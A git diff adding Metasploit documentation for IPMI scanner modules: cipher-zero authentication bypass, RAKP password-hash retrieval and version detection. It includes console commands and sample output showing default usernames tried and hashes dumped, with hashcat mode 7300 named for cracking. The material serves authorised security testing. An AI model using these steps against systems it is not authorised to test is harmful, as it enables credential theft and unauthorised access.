diff --git a/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md b/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md new file mode 100644 index 0000000000..a1a659e73c --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md @@ -0,0 +1,20 @@ +The ipmi_cipher_zero module is used to find IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of IPMI cipher zero, which means no cipher is used at all. + +## Vulnerable Devices + +This is an error in the IPMI 2.0 specification itself, so any device BMC fully implementing IPMI 2.0 will possibly have the vulnerable non-cipher enabled. + +## Verification Steps + +Set RHOSTS to the target device or range and run: + +``` +msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero +msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.2 +RHOSTS => 192.168.1.2 +msf auxiliary(ipmi_cipher_zero) > run + +[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts) +[*] 192.168.1.2:623 - IPMI - NOT VULNERABLE: Rejected cipher zero with error code 17 + +``` diff --git a/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md b/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md new file mode 100644 index 0000000000..a2dea7c4a4 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md @@ -0,0 +1,34 @@ +The ipmi_dumphashes module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300. + +## Vulnerable Devices + +Any IPMI 2.0 device implementing the RAKP protocol according to the IPMI specification is vulnerable. This is a design flaw rather than a vendor-specific vulnerability. + +## Verification Steps + +Set RHOSTS to the target device or range and run: + +``` +msf > use auxiliary/scanner/ipmi/ipmi_dumphashes +msf auxiliary(ipmi_dumphashes) > set RHOSTS 192.168.1.2 +RHOSTS => 192.168.1.2 +msf auxiliary(ipmi_dumphashes) > run + +[*] 192.168.1.2:623 - IPMI - Sending IPMI probes +[*] 192.168.1.2:623 - IPMI - Trying username 'ADMIN'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'admin'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username admin: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'root'... +[+] 192.168.1.2:623 - IPMI - Hash found: root:redacted +[*] 192.168.1.2:623 - IPMI - Trying username 'Administrator'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username Administrator: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'USERID'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'guest'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username guest: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username ''... +[+] 192.168.1.2:623 - IPMI - Hash found: redacted +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` diff --git a/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md b/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md new file mode 100644 index 0000000000..556eceeba7 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md @@ -0,0 +1,21 @@ +The ipmi_version module is used to identify the version of the IPMI specification implemented by devices on a network. + +## Target Devices + +Any exposed device that implements the IPMI specification should work with this module. This is a recon module rather than an exploitation module. + +## Verification Steps + +Set RHOSTS to the target device or range and run: + +``` +msf > use auxiliary/scanner/ipmi/ipmi_version +msf auxiliary(ipmi_version) > set RHOSTS 192.168.1.2 +RHOSTS => 192.168.1.2 +msf auxiliary(ipmi_version) > run + +[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts) +[*] 192.168.1.2:623 - IPMI - Probe sent +[+] 192.168.1.2:623 - IPMI - IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0) + +``` diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index 56bf04f8e5..48396e70d1 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner', 'Description' => %q| - This module identifies IPMI 2.0 compatible systems that are vulnerable + This module identifies IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero. |, diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index 86ef288890..61259b1e99 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval', 'Description' => %q| - This module identifies IPMI 2.0 compatible systems and attempts to retrieve the + This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.